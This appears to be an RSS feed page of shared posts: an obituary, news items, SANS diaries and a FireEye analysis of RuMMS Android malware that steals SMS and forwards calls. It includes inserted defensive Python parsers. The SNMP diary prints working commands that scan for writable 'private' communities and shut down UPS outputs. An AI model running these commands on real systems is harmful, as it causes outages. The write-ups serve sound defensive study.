Shared posts

20 Jul 14:39

In memoriam Philippe Aigrain (1949-2021)

by martin

It is with great sadness that we learned of the death of Philippe Aigrain on Sunday 11th of July, in the mountains, near his home in the French Pyrénées.

Philippe was a computer scientist and a great humanist, a tireless activist, a researcher and an intellectual who helped us see things more clearly in these troubled times. Philippe was one of the historical co-founders of La Quadrature du Net in 2008 and went on to become President of the Association from 2013 to 2017. As a young man, he had taken part in the May 1968 uprising. He was later a fellow traveler of the Free Radio Movement in the 1970s, before exploring the democratic potential of the Internet and becoming an ardent defender of Free Software and the Commons. In recent years, he focused on solidarity in refugee reception, and directed the publishing house PublieNet, while also publishing poems of his own and, more recently, his first novel, Sœur(s).

Philippe was one of those people who immediately commanded respect and admiration for his exceptional human qualities, his immense kindness and great sensitivity, but also for the depth of his thinking, his curiosity, his generosity, his ability to combine knowledge from the many fields he was versed in. All of this allowed him not only to move easily between activist, intellectual and artistic communities around the world, but also to make valuable contributions and build bridges between them.

At La Quadrature, he was a role model for many of us, a mentor and a friend. Always curious, open, but also very supportive of people new to the organisation. He was one of the pillars that kept us going and got us through tough times. We admired his capacity for indignation, the thoroughness and depth of his analyses, the way he could set aside certain activist reactions to size up a situation in all its complexity. When there was a risk of drowning in the details of an issue, he would encourage us to step back and return to the fundamental political issues at stake. During an internal debate at the end of 2016, we were discussing our position on the creation of the TES biometric file in France, which the government was then presenting as a way of fighting “identity fraud”… We were cooking up arguments that were a little too technical and legal for his liking. He got everyone on the same page by referring to the Resistance during WWII and reminding us that forgery-proof identity documents are simply contrary to a democratic way of life.

Right from the beginning, Philippe insisted that La Quadrature should be proactive and produce positive proposals. He created an entire system to allow the public and creators to engage around their works by allowing the free sharing of these works, while financially supporting and encouraging creation. He was the instigator of the Creative Contribution, an avant-garde idea allowing generalised access to culture balanced with material support for creation. With Lionel Maurel, he compiled these proposals in the positive proposals for copyright reform, published by La Quadrature following the rejection of the ACTA anti-counterfeiting trade agreement, in the summer of 2012.

Over all these years, Philippe taught us that it is possible to combine a lucid view of the world and a high level of political commitment, while never forsaking either care for others or for oneself, nor indeed joy and poetry.

We will take the time to honor his memory. We will keep his legacy alive by continuing the fight, whether for Human Rights in the digital environment, the sharing of knowledge or, simply, for more beauty and humanity in this world.

For now, our thoughts and sympathy are with his wife Mireille, his daughters and his grandchildren.

  • Sister(s), a novel addressing the issues of surveillance, published September 2020 by Publienet.
  • Sharing, Culture and the Economy in the Internet Age, a plea for the right to non-market sharing of cultural works, published in 2011 by the University of Amsterdam Press.
  • Cause Commune, an essay in favor of the information commons and against intellectual property, published in 2005 by Fayard.
  • Some of Philippe’s poems can be found here https://www.atelierdebricolage.net/
11 Jul 08:40

By TropGentil

Today, I am so afraid of hurting people that I lied to my girlfriend, telling her that I had cheated on her too, when she announced that she had done it. So that she would not feel guilty. FML
29 Nov 10:20

Huge macOS bug: root access without a password

A major security flaw hits macOS High Sierra. It allows administrator access to a Mac without a password. Locally, the ease of exploitation is stunning.
20 Nov 12:40

Knowledge of 12/11/2017

The column on the Place Vendôme in Paris was erected by Napoleon in 1810. It is covered with a facing cast from the bronze of the cannons taken from the Russian and Austrian armies at the Battle of Austerlitz.
14 Nov 11:48

OnePlus: a hidden direct root access in its smartphones

An application preinstalled on OnePlus smartphones acts as a backdoor granting root access, without needing to unlock the bootloader.
01 Nov 17:33

17 April 1975: the Khmer Rouge enter Phnom Penh

by podcast@radiofrance.com
duration: 00:52:49 - Affaires sensibles - by: Fabrice DROUELLE - Today on Affaires Sensibles, the first episode of our series on the history of the Cambodian genocide. - guests: Patrice DE BEER - produced by: Fabrice Laigle
23 Oct 12:26

Google to add "DNS over TLS" security feature to Android OS

by noreply@blogger.com (Mohit Kumar)
No doubt your Internet Service Providers (ISPs), or network-level hackers, cannot spy on HTTPS communications. But do you know that ISPs can still see all of your DNS requests, allowing them to know which websites you visit? Google is working on a new security feature for Android that could protect your Internet traffic from network spoofing attacks. Almost every Internet activity starts with a
18 Oct 09:09

Peeking into .msg files, (Sun, Oct 15th)

Readers often submit malware samples, and sometimes the complete email with attachment, for example exported from Outlook as a .msg file.

Did you know that .msg files use the Compound File Binary Format (what I like to call OLE files), and can be analysed with oledump?

Reader Carlos Almeida submitted a .msg file with malicious .rar attachment.

I'm not that familiar with .msg file intricacies, but by looking at the stream names and sizes, I can often find what I'm looking for:

Stream 53 seems to contain the message:

From this hex/ASCII dump, you can probably guess that the message is stored in UNICODE format. We can use option -t (translate) of oledump to decode it as UTF-16:

Stream 43 contains the headers. I don't want to disclose private information like our reader's email address, so I grepped for some headers that I can disclose:

The Subject header is encoded according to RFC1342 because the subject contains non-ASCII characters. It decodes to this:

These are Chinese characters that seem to mean the same as FW: (forwarding).

Stream 3 contains the attachment:

You can see it's a RAR file.

I use 7zip to look into it. It should be possible to do this without writing the file to disk, by just piping the data into 7zip (options -si and -so can help with piping), but unfortunately I got errors trying this and resigned myself to saving it to disk:

It contains an unusually large .bat file:

It's actually a PE file:

This looks to be a VB6 executable (from the PEiD signature), I should dig up my VB6 decompiler and try to take a closer look.

Of course, it's malware.
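The three decoding steps of this diary (an RFC 2047 encoded-word Subject, a UTF-16 message stream, and an attachment whose extension lies about its content) can be reproduced offline on extracted stream bytes. The following is an added example, not Didier's code and not part of oledump: it assumes you have already pulled the streams out of the .msg container (with oledump or similar), and all sample inputs (the subject text, the body and the fake "invoice.bat" PE stub) are constructed here, not taken from the reader's submission.

```python
import base64
import email.header
import struct

# --- Constructed samples (not from the submitted .msg) ---------------------
SAMPLE_SUBJECT = "=?UTF-8?B?" + base64.b64encode("转发: invoice".encode("utf-8")).decode("ascii") + "?="
SAMPLE_BODY_STREAM = "Please see the attached file.".encode("utf-16-le") + b"\x00\x00"


def _fake_pe() -> bytes:
    """Minimal MZ header whose e_lfanew (offset 0x3C) points at a PE\\0\\0 signature."""
    buf = bytearray(0x48)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\x00\x00"
    return bytes(buf)


SAMPLE_ATTACHMENT_NAME = "invoice.bat"   # a .bat name on what is really a PE image
SAMPLE_ATTACHMENT = _fake_pe()


# --- Decoding helpers -------------------------------------------------------
def decode_subject(raw: str) -> str:
    """Decode RFC 2047 encoded-words (the successor of RFC 1342) in a Subject header."""
    parts = []
    for text, charset in email.header.decode_header(raw):
        if isinstance(text, bytes):
            parts.append(text.decode(charset or "ascii", "replace"))
        else:
            parts.append(text)
    return "".join(parts)


def decode_unicode_stream(data: bytes) -> str:
    """MSG string properties of the Unicode type are UTF-16LE, usually NUL-terminated."""
    return data.decode("utf-16-le", "replace").rstrip("\x00")


def identify_by_magic(data: bytes) -> str:
    """Classify content by its leading bytes, ignoring whatever the file name claims."""
    if data.startswith(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"):
        return "ole"       # Compound File Binary: .msg, legacy Office documents
    if data.startswith(b"Rar!\x1a\x07"):
        return "rar"       # RAR 4.x and RAR 5 archives share this prefix
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
        return "mz"        # DOS header without a PE signature
    return "unknown"


BINARY_TYPES = {"ole", "rar", "pe"}
EXPECTED_TYPE_FOR_EXT = {".rar": "rar", ".exe": "pe", ".dll": "pe", ".msg": "ole"}


def classify_attachment(name: str, data: bytes) -> dict:
    """Flag an attachment whose bytes contradict its extension (e.g. a .bat that is a PE)."""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    actual = identify_by_magic(data)
    expected = EXPECTED_TYPE_FOR_EXT.get(ext)
    # A text-like extension carrying a recognised binary signature is always a mismatch;
    # a binary extension is a mismatch only when the signature disagrees with it.
    mismatch = actual in BINARY_TYPES and expected != actual
    return {"name": name, "actual": actual, "expected": expected, "mismatch": mismatch}


if __name__ == "__main__":
    print(decode_subject(SAMPLE_SUBJECT))
    print(decode_unicode_stream(SAMPLE_BODY_STREAM))
    print(classify_attachment(SAMPLE_ATTACHMENT_NAME, SAMPLE_ATTACHMENT))
```

The PE check follows the e_lfanew pointer rather than just looking for "MZ", so a DOS stub without a PE header is reported separately; the extension check is what turns "an unusually large .bat file" into an alert without anyone having to open it.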


Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
13 Oct 09:31

Palo Alto Networks prepares to offer LightCyber's technology

by LeMagIT(editor@www.fr)
At the Assises de la Sécurité, René Bonvanie, marketing director of Palo Alto Networks, said that the equipment vendor plans to bring this technology to its customers by the end of the year.
13 Oct 09:24

More and more websites are mining crypto-coins in your browser to pay their bills, line pockets (The Register)

09 Oct 12:19

A strange JPEG file, (Sun, Oct 8th)

I had a JPEG file to analyze that would not render properly: image viewers would display an error, but no image.

My new jpegdump tool confirmed that it started with the right JPEG markers, but that the data sizes were wrong:

2576 bytes for an APP0 marker is really large...

Taking a look with a hex editor, I saw that the markers were present, but that the sizes of the data were wrong.

With re-search, I took a closer look at the markers with their data size:

The size of the data following a marker is encoded in two bytes, big endian notation. And for the first markers in the JPEG file, they all looked too large. Then I noticed that the 3rd byte (i.e. the first byte of the size field) was always 0x0A, where I expected it to be 0x00.

Counting all the bytes reveals that in this file, there were no 0x00 bytes but an unusually large number of 0x0A bytes:

I formed a hypothesis: somehow, all 0x00 values were replaced by 0x0A values. To test this hypothesis, I replaced all 0x0A values by 0x00 values and parsed the result with jpegdump:

This was indeed a JPEG file. But I could not repair it, as I did not know which 0x0A values were original bytes, and which were replacement values for 0x00.

At least I knew it was most likely not malicious, but corrupted by some unknown process.


Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
05 Oct 14:33

Emmanuel Macron: online voting in the legislative elections for French citizens abroad

Used in 2012 but suspended in 2017, online voting in the legislative elections for French citizens abroad will return in 2022. A request from the President of the Republic.
02 Oct 15:45

VideoLAN turned down tens of millions of dollars to put ads in VLC

by Julien Lausson

Did you know that the president of VideoLAN turned down tens of millions of dollars in exchange for adding advertisements and dubious bits of code to VLC? Do you know the story of the media player's icon? Or of the risk that the NSA and the CIA pose to the project? No? Then it is time to read the answers the president of VideoLAN gave to questions from Internet users. [Read more]
25 Sep 16:50

The birth of a ninja

by noreply@9gag-rss.com
25 Sep 15:47

Hiding objects behind an "optical curtain"

Now you see it, now you don't! The invisibility cloak is getting closer to reality. Photonics is a fast-growing field that makes it possible to start envisioning...
24 Oct 06:20

Dyn issues affecting joint customers

by Filippo Valsorda

Today there is an ongoing, large scale Denial-of-Service attack directed against Dyn DNS. While Cloudflare services are operating normally, if you are using both Cloudflare and Dyn services, your website may be affected.

Specifically, if you are using CNAME records which point to a zone hosted on Dyn, our DNS queries directed to Dyn might fail making your website unavailable, and presenting a “1001” error message.

Some popular services that might rely on Dyn for part of their operations include GitHub Pages, Heroku, Shopify and AWS.


As a possible workaround, you might be able to update your Cloudflare DNS records from CNAMEs (referring to Dyn hosted records) to A/AAAA records specifying the origin IP of your website. This will allow Cloudflare to reach your origin without the need for an external DNS lookup.

Note that if you use different origin IP addresses, for example based on the geographical location, you may lose some of that functionality by using plain A/AAAA records. We recommend that you provide addresses for many of your different locations, so that load will be shared amongst them.

Customers with a CNAME setup (which means Cloudflare is not configured in your domain NS records) where the main zone is hosted on a Dyn service will be affected as well. You might be able to make Cloudflare your authoritative DNS provider by contacting support and asking to be changed to Full mode and then updating your nameservers at your registrar, but the change can take up to 48h to propagate.

Please note that the Cloudflare status page and support system might be affected by the ongoing attack, since they are hosted on third parties, as per industry best practices.
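The workaround above amounts to two questions a zone owner has to answer quickly during an upstream DNS outage: which of my records depend on a third-party DNS operator, and what do they become once rewritten as A/AAAA records? The following is an added example, not Cloudflare code: it parses a constructed BIND-style zone fragment (example.com and 192.0.2.0/24 are reserved documentation values, and "dyn-provider.example" stands in for the external DNS host) and rewrites the external CNAMEs from an address map you would have to supply from your own inventory.

```python
from collections import defaultdict

# Constructed zone fragment; names and addresses are documentation placeholders.
SAMPLE_ZONE = """\
$ORIGIN example.com.
@       300 IN A     192.0.2.10
www     300 IN CNAME web.dyn-provider.example.   ; hosted by a third-party DNS operator
shop    300 IN CNAME shop.example.com.           ; internal alias, no external lookup
blog    300 IN CNAME pages.other-host.example.
api     300 IN AAAA  2001:db8::1
"""


def _fqdn(name: str, origin: str) -> str:
    """Qualify a relative owner name or CNAME target against $ORIGIN."""
    if name == "@":
        return origin
    return name if name.endswith(".") else f"{name}.{origin}"


def parse_zone(text: str):
    """Return [(owner_fqdn, rtype, rdata), ...] for simple one-line records."""
    origin = "."
    records = []
    for line in text.splitlines():
        line = line.split(";")[0].strip()          # drop comments
        if not line:
            continue
        if line.startswith("$ORIGIN"):
            origin = line.split()[1]
            continue
        fields = line.split()
        if len(fields) < 5:
            raise ValueError(f"unexpected record line: {line!r}")
        name, _ttl, _cls, rtype, rdata = fields[:5]
        if rtype == "CNAME":
            rdata = _fqdn(rdata, origin)
        records.append((_fqdn(name, origin), rtype, rdata))
    return records


def _registrable(fqdn: str) -> str:
    """Crude 'provider' label: the last two DNS labels of the target."""
    return ".".join(fqdn.rstrip(".").split(".")[-2:])


def external_cname_dependencies(records, origin: str) -> dict:
    """Group CNAME owners by the external domain their resolution depends on.
    Aliases that stay inside the zone need no external lookup and are skipped."""
    deps = defaultdict(list)
    for name, rtype, target in records:
        if rtype != "CNAME":
            continue
        if target == origin or target.endswith("." + origin):
            continue
        deps[_registrable(target)].append(name)
    return dict(deps)


def replace_cname_with_addresses(records, address_map: dict):
    """Rewrite CNAMEs whose target is in address_map as A/AAAA records, one per
    address, so the front-end proxy can reach the origin without resolving the
    external name.  Targets not in the map are left untouched."""
    out = []
    for name, rtype, rdata in records:
        if rtype == "CNAME" and rdata in address_map:
            for ip in address_map[rdata]:
                out.append((name, "AAAA" if ":" in ip else "A", ip))
        else:
            out.append((name, rtype, rdata))
    return out


if __name__ == "__main__":
    recs = parse_zone(SAMPLE_ZONE)
    print(external_cname_dependencies(recs, "example.com."))
    print(replace_cname_with_addresses(recs, {"web.dyn-provider.example.": ["192.0.2.20", "2001:db8::20"]}))
```

Listing several addresses per name is what the post recommends when the external CNAME was doing geographic steering: the proxy then spreads load across all of them instead of following the provider's per-region answer.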

06 Oct 12:02

TCP joke

by noreply@9gag-rss.com
29 Sep 12:59

SNMP Pwn3ge, (Wed, Sep 28th)

Sometimes getting access to company assets is very complicated. Sometimes it is much easier (read: too easy) than expected. If one of the goals of a pentester is to get juicy information about the target, preventing the IT infrastructure from running efficiently (denial of service) is also a win. Indeed, in some business fields, if the infrastructure is not running, the business is impacted and the company may lose a lot of money. Think about traders.

I was recently involved in a pentest with the goal to test the customer's internal network. The scope was easy: come on site, connect your laptop to a free network port and see what you can find/do. In such a scenario, the breaking point is to successfully get connected to the network. If Mr DHCP is kind enough to provide you an IP address, you are in and you may consider the network as already compromised. This was the case for me: no protection against rogue devices, no network access control. I launched my Ettercap and started to sniff some packets playing MitM. I immediately grabbed some nice SNMP packets with interesting communities like "public" and "private". As you probably know, those are the default ones on many systems. "public" usually provides read-only access and "private" is used in read-write mode. Often, I hear this comment: "But SNMP is just a monitoring protocol, why should I care?". Wrong! SNMP, as described by RFC 3411 [1], means Simple Network Management Protocol and not Monitoring Protocol. If you have SNMP read access to a device, you can collect interesting information (version, processes, IP information, health) for the reconnaissance phase. But if you have SNMP write access to a device, you can alter its configuration and cause much more damage.

During the pentest, I used the following commands:

    # nmap -Pn -sU -p 161 -v -oA snmp 192.168.1.0/24
    # grep 161/open/udp snmp.gnmap | awk '{ print $2 }' | while read IP
    do
      snmpwalk -v1 -c private $IP >/dev/null 2>&1
      if [ $? == 0 ]
      then
        echo "$IP accepts private community"
        echo $IP >>vulnerable_ip.tmp
      fi
    done

The next step was to identify the vulnerable devices. This information is discoverable with the OID sysDescr:

    # snmpwalk -v1 -On -c xxxxxxxxx 192.168.254.4 SNMPv2-MIB::sysDescr.0
    .1.3.6.1.2.1.1.1.0 = STRING: Cisco IOS Software, C1600 Software (AP1G2-K9W7-M), Version 15.2(2)JB2, RELEASE SOFTWARE (fc1)

Guess what? Most vulnerable devices were UPS management systems configured with default settings or, more precisely, not configured at all. The next step was to browse the vendor MIB (Management Information Base). The vendor ID was 534 and is assigned to Eaton Corporation [2]. The MIB reveals some interesting read/write OIDs like this one: 1.3.6.1.4.1.534.1.9.1. This OID is called xupsControlOutputOffDelay. Here is the description:

Setting this value to other than zero will cause the UPS output to turn off after the number of seconds. Setting it to 0 will cause an attempt to abort a pending shutdown.

We are close to performing a nice DoS against the customer's infrastructure. How? A simple snmpset command will help us. Let's see:

    for IP in `cat vulnerable_ip.tmp`
    do
      snmpset -c private -v1 $IP 1.3.6.1.4.1.534.1.9.1 i 10
      echo -n "$IP d=10 "
      # countdown loop: the inner loop body was garbled in extraction and is
      # reconstructed here as a ten-second wait matching the delay value above
      for d in `seq 10`
      do
        sleep 1
        echo -n .
      done
      echo " Tango down!"
    done

Game over! Note that this is a proof of concept. In most pentest engagements, you're not allowed to perform such actions.

It is a pity that such a very simple attack is still possible in 2016! If the customer followed the SANS Top-20 controls [3], this attack wouldn't be possible:

  • CSC1 - Inventory of authorized and unauthorized devices
  • CSC4 - Continuous vulnerability scanning, assessment, and remediation
  • CSC9 - Limitation and control of network ports, protocols, and services
  • CSC11 - Secure configuration for network devices such as firewalls, routers, and switches
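From the defender's side, the traffic described in this diary is easy to recognise on the wire: SNMPv1 carries the community string in clear text, the PDU type distinguishes a read from a write, and the varbind OID says which object is being touched. The following is an added example, not the author's code and not part of any ISC tool: a minimal BER encoder/decoder for SNMPv1 messages that flags default communities, SetRequest PDUs and writes to the Eaton OID named above. The packets it inspects are constructed in the block (not captures from the engagement), and a real deployment would feed it UDP/161 payloads from a capture instead.

```python
# Constructed SNMPv1 packets for detection testing; nothing here is sent on a network.

def ber(tag: int, content: bytes) -> bytes:
    """Encode one BER TLV (short-form length only, enough for these small packets)."""
    if len(content) >= 128:
        raise ValueError("long-form length not supported by this helper")
    return bytes([tag, len(content)]) + content


def ber_int(value: int) -> bytes:
    return ber(0x02, bytes([value]))     # small non-negative integers only


def ber_oid(dotted: str) -> bytes:
    """Encode a dotted OID: first two arcs packed into one byte, rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    body = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body += bytes(reversed(chunk))
    return ber(0x06, bytes(body))


def build_snmpv1(community: str, pdu_tag: int, oid: str, int_value=None) -> bytes:
    """Message ::= SEQUENCE { version INTEGER(0), community OCTET STRING, PDU }."""
    value = ber_int(int_value) if int_value is not None else ber(0x05, b"")   # NULL for Get
    varbind_list = ber(0x30, ber(0x30, ber_oid(oid) + value))
    pdu = ber(pdu_tag, ber_int(1) + ber_int(0) + ber_int(0) + varbind_list)   # id, status, index
    return ber(0x30, ber_int(0) + ber(0x04, community.encode("ascii")) + pdu)


def parse_tlv(data: bytes, pos: int = 0):
    """Return (tag, content, next_pos); handles short and long-form lengths."""
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length


def decode_oid(body: bytes) -> str:
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}
DEFAULT_COMMUNITIES = {"public", "private"}
XUPS_CONTROL_OUTPUT_OFF_DELAY = "1.3.6.1.4.1.534.1.9.1"   # Eaton OID named in the diary


def inspect_snmp(packet: bytes) -> dict:
    """Decode an SNMPv1 message and list the reasons a defender would alert on it."""
    tag, msg, _ = parse_tlv(packet)
    if tag != 0x30:
        raise ValueError("not a BER SEQUENCE")
    _, ver, pos = parse_tlv(msg)
    _, comm, pos = parse_tlv(msg, pos)
    pdu_tag, pdu, _ = parse_tlv(msg, pos)
    pos = 0
    for _ in range(3):                        # request-id, error-status, error-index
        _, _, pos = parse_tlv(pdu, pos)
    _, varbinds, _ = parse_tlv(pdu, pos)
    oids, pos = [], 0
    while pos < len(varbinds):
        _, vb, pos = parse_tlv(varbinds, pos)
        _, oid_body, _ = parse_tlv(vb)
        oids.append(decode_oid(oid_body))
    community = comm.decode("ascii", "replace")
    alerts = []
    if community in DEFAULT_COMMUNITIES:
        alerts.append("default community '%s'" % community)
    if pdu_tag == 0xA3:
        alerts.append("SetRequest (write operation)")
    if XUPS_CONTROL_OUTPUT_OFF_DELAY in oids:
        alerts.append("targets xupsControlOutputOffDelay (UPS output shutdown timer)")
    return {"version": int.from_bytes(ver, "big"), "community": community,
            "pdu": PDU_NAMES.get(pdu_tag, "0x%02X" % pdu_tag), "oids": oids, "alerts": alerts}


if __name__ == "__main__":
    print(inspect_snmp(build_snmpv1("private", 0xA3, XUPS_CONTROL_OUTPUT_OFF_DELAY, 10)))
    print(inspect_snmp(build_snmpv1("m0n1t0r-ro", 0xA0, "1.3.6.1.2.1.1.1.0")))
```

A SetRequest from any host that is not the management station, or any packet carrying "public"/"private", is worth an alert on its own; the OID match just tells the analyst how bad the write would have been. Changing the communities and restricting UDP/161 to the management network (CSC9 and CSC11 above) removes the problem at the source.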

[1] https://www.ietf.org/rfc/rfc3411.txt
[2] https://www.iana.org/assignments/enterprise-numbers/enterprise-numbers
[3] https://www.sans.org/media/critical-security-controls/critical-controls-poster-2016.pdf

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
29 Sep 10:02

In the Robot Skies: a film shot entirely by autonomous drones

by Julien Lausson

The film In the Robot Skies does not merely tell a story in which drones play an important role. It was also shot using autonomous drones. [Read more]
20 Sep 10:37

Watch Chinese Hackers Control Tesla's Brakes From 12 Miles Away

by Thomas Fox-Brewster
First ever remote Tesla hack sees brakes killed and the boot opened mid-drive, Tencent security researchers claim.
19 Sep 11:35

Equation Group was able to extract VPN keys from Cisco PIX firewalls

by UnderNews
The documents from the recent leak affecting the Equation Group hacking group have been matched with those of Edward Snowden's revelations. A flaw in Cisco firewalls allowed the NSA to seize VPN keys and decrypt up to a thousand VPN connections per hour.
05 Sep 08:39

Outsourcing down against a backdrop of IaaS/SaaS growth in EMEA

by Maryse Gros
For the second quarter of 2016, the ISG index covering outsourcing contracts with an annual value above (...)
27 Jun 09:56

The data of 112,000 French police officers and their relatives leaked

The database of the Mutuelle Générale de la Police was compromised. But it reportedly was not an attack, rather an act of revenge.
13 Jun 10:26

Symantec acquires Blue Coat for $4.65 billion

by Maryse Gros with IDG News Service
Security solutions vendor Symantec is acquiring Blue Coat, a cybersecurity specialist, (...)
18 May 08:15

Disheartened, La Quadrature du Net will no longer fight laws head-on

by Guillaume Champeau

Adrienne Charmet-Alix, campaigns director of La Quadrature du Net.

A further sign that so-called "democratic" institutions are increasingly struggling to convince of their democratic effectiveness: La Quadrature du Net explained on Tuesday that it is tired of fighting on parliamentary ground and prefers to refocus its action closer to the public. [Read more]
17 May 14:22

Cisco: critical flaw in its telepresence systems

The vulnerability, now patched, allows remote takeover of the devices. Cisco also announces other patches.
26 Apr 12:57

RuMMS: The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing

by Wu Zhou
Introduction

Recently we observed an Android malware family being used to attack users in Russia. The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia. Because all the URLs used in this campaign have the form of hxxp://yyyyyyyy[.]XXXX.ru/mms.apk (where XXXX.ru represents the hosting provider’s domain), we named this malware family RuMMS.

To lure the victims to download the malware, threat actors use SMS phishing – sending a short SMS message containing a malicious URL to the potential victims. Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware. Figure 1 describes this infection process and the main behaviors of RuMMS.

Figure 1. Overview of the RuMMS campaign and behaviors

On April 3, 2016, we still observed new RuMMS samples emerging in the wild. The earliest identified sample, however, can be traced back to Jan. 18, 2016. Within this time period, we identified close to 300 samples belonging to this family (all sample hashes are listed in the Appendix).

After landing on the victim’s phone, the RuMMS apps will request device administrator privileges, remove their icons to hide themselves from users, and remain running in the background to perform a series of malicious behaviors. So far we have identified the following behaviors:

  • Sending device information to a remote command and control (C2) server.
  • Contacting the C2 server for instructions.
  • Sending SMS messages to financial institutions to query account balances.
  • Uploading any incoming SMS messages (including the balance inquiry results) to the remote C2 server.
  • Sending C2-specified SMS messages to phone numbers in the victim's contacts.
  • Forwarding incoming phone calls to intercept voice-based two-factor authentication.

Each of these behaviors is under the control of the remote C2 server. In other words, the C2 server can specify the message contents to be sent, the time period in which to forward the voice call, and the recipients of outgoing messages. As part of our investigation into this malware, we emulated an infected Android device in order to communicate with the RuMMS C2 server. During one session, the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers, all of which were associated with Russian financial institutions. At least three of the messages were intended to check a user's account balance at the institution (we could not confirm the purpose of the fourth). Through additional research, we identified several forum posts where victims complained that funds (up to 600 rubles) were transferred out of their accounts after RuMMS infected their phones.

We do not know exactly how many people have been infected with RuMMS malware. However, our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016, with a peak in March of more than 1,100 infections.

Smishing: The Major Way To Distribute RuMMS

We have not observed any instances of RuMMS on Google Play or other online app stores. Smishing (SMS phishing) is currently the primary way threat actors are distributing the malware. The process starts when an SMS phishing message arrives at a user's phone. An example SMS message is shown in Figure 1. The message translates roughly to "You got a photo in MMS format: hxxp://yyyyyyyy.XXXX.ru/mms.apk."

So far we identified seven different URLs being used to spread RuMMS in the wild. All of the URLs reference the file “mms.apk” and all use the domain “XXXX.ru”, which belongs to a top five shared hosting platform in Russia (the domain itself has been obfuscated to anonymize the provider).

The threat actors registered at least seven subdomains through the hosting provider, each consisting of eight random-looking characters (asdfgjcr, cacama18, cacamadf, konkonq2, mmsmtsh5, riveroer, and sdfkjhl2.) As of this writing, no files were hosted at any of the links. The threat actors seem to have abandoned these URLs and might be looking into other ways to reach more victims.

Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors. It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target. Many top providers in Russia offer cheap prices for their shared hosting services, and some even provide free 30-day trial periods. Threat actors can register subdomains through the hosting provider and use the provider’s services for a short-period campaign. A few days later they can cancel the trial and do not need to pay a penny. In addition, these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct (or compromise) themselves.

RuMMS Code Analysis

All RuMMS samples share the same behaviors, major parts of which are shown in Figure 1. However, the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools. We used a sample app named “org.starsizew” with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS’s code.

Several of the main components of RuMMS are shown in Figure 2. The activity class "org.starsizew.MainActivity" executes when the app is started. It first starts another activity defined in "org.starsizew.Aa" to request device administrator privileges, and then calls the following API of "android.content.pm.PackageManager" (the Android package manager) to remove its own icon from the home screen in order to conceal the existence of RuMMS from the user:

            setComponentEnabledSetting(MainActivity.class, 2, 1)

At the same time, "org.starsizew.MainActivity" will start the main service as defined in "org.starsizew.Tb", and use a few mechanisms to keep the main service running continuously in the background. The class "org.starsizew.Ac" is designed for this purpose; its only task is to check if the main service is running, and restart the main service if the answer is no. The class "org.starsizew.Tb" also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered. Other than that, its major functionality is to collect private device information, upload it to a remote C2 server, and handle any commands as requested by the C2 server. All those functions are implemented in asynchronous tasks by "org.starsizew.i".

Figure 2. Android Manifest File of RuMMS

The class “org.starsizew.Ma” is registered to intercept incoming SMS messages, the arrival of which will trigger the Android system to call its “onReceive” API. Its major functionality is also implemented through the call of the asynchronous task (“org.starsizew.i”), including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker.

C2 Communication

The C2 communication includes two parts: sending information to the remote HTTP server and parsing the server’s response to execute any commands as instructed by the remote attackers. The functionality for these two parts is implemented by doInBackground and onPostExecute respectively, two API methods of “android.os.AsyncTask” as extended by class “org.starsizew.i”.

Figure 3. Method doInBackground: to send information to remote C2 server

As seen from the major code body of method doInBackground shown in Figure 3 (some of the original classes and methods are renamed for easier understanding), there are three calls to HttpPost with different contents as parameters. At line 5, local variable v4 specifies the first parameter url, which can be changed by the remote C2 server later. These URLs are all in the form of “http://$C2.$SERVER.$IP/api/?id=$NUM”. The second parameter is a constant string “POST”, and the third parameter is a series of key-value pairs to be sent, assembled at runtime. The value of the first item, whose key is “method” (line 7), indicates the type of the contents: install, info and sms.

The first type of content, starting with “method=install”, will be sent when the app is started for the first time, including the following device private information:

  • Victim identifier
  • Network operator
  • Device model
  • Device OS version
  • Phone number
  • Device identifier
  • App version
  • Country

Figure 4 is an example of this string as seen by the FireEye Mobile Threat Prevention platform.

Figure 4. Example HTTP post message

The second type of information will be sent periodically to indicate that the device is alive. It only has two parts, the method indicated by word “info” and the victim identifier. The third type of information will be sent when RuMMS intercepts any SMS messages, including the balance inquiry results when it contacts the SMS code of a particular financial service.

